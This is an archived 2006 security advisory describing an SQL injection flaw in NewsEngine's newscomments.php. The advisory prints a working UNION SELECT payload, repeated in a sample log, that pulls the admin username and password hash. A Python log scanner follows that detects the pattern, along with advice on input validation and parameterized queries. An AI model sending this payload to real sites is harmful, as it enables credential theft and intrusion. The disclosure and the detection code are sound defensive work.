Computer Security
[EN] securityvulns.ru



From: ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date: 06.06.2006
Subject: NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability

# Title  :   NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability
# Author :   ajann

### Vulnerability;

$$$ http://[target]/[path]/newscomments.php

Example:

$$
http://[target]/[path]/newscomments.php?newsid='/**/union/**/select/**/0,
username,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0/**/from/**/news1_user/**/where/**/userid=1/*

Admin MD5 HaSh
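
Added example (not part of the original advisory and not NewsEngine code): a check over web server access logs for the request shape shown above, where `/**/` comments stand in for spaces inside the `newsid` parameter. It assumes `newsid` is meant to be a plain integer id and that logs are in Apache combined format; the sample log lines and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)   # e.g. /**/ used instead of a space
SQL_KEYWORDS = re.compile(r"\b(?:union|select|from|where)\b", re.I)

def classify_newsid(value):
    """Return 'ok', 'sqli-pattern' or 'non-numeric' for one decoded newsid value."""
    if re.fullmatch(r"[0-9]{1,10}", value):        # assumption: ids are integers
        return "ok"
    # Turn comments (closed or dangling) into spaces so that
    # union/**/select is matched as two separate words.
    normalized = INLINE_COMMENT.sub(" ", value).replace("/*", " ")
    if SQL_KEYWORDS.search(normalized):
        return "sqli-pattern"
    return "non-numeric"

def scan(lines, script="newscomments.php", param="newsid"):
    """Return (line_number, verdict, value) for every suspicious request."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes, so %27 and a literal ' are treated alike.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            verdict = classify_newsid(value)
            if verdict != "ok":
                hits.append((lineno, verdict, value))
    return hits

# Constructed sample log lines (documentation IP range, shortened column list).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Jun/2006:10:00:01 +0000] "GET /news/newscomments.php?newsid=42 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [06/Jun/2006:10:00:07 +0000] "GET /news/newscomments.php?newsid=%27/**/union/**/select/**/0,'
    'username,userpassword,0/**/from/**/news1_user/**/where/**/userid=1/* HTTP/1.1" 200 733',
    '192.0.2.51 - - [06/Jun/2006:10:01:30 +0000] "GET /news/newscomments.php?newsid=abc HTTP/1.1" 200 512',
    '192.0.2.10 - - [06/Jun/2006:10:02:00 +0000] "GET /news/index.php?newsid=1%27 HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for lineno, verdict, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: {verdict}: {value!r}")
```

The same integer-only rule applied server-side before the value reaches the query, together with parameterized queries, closes the hole that this check only detects.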

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod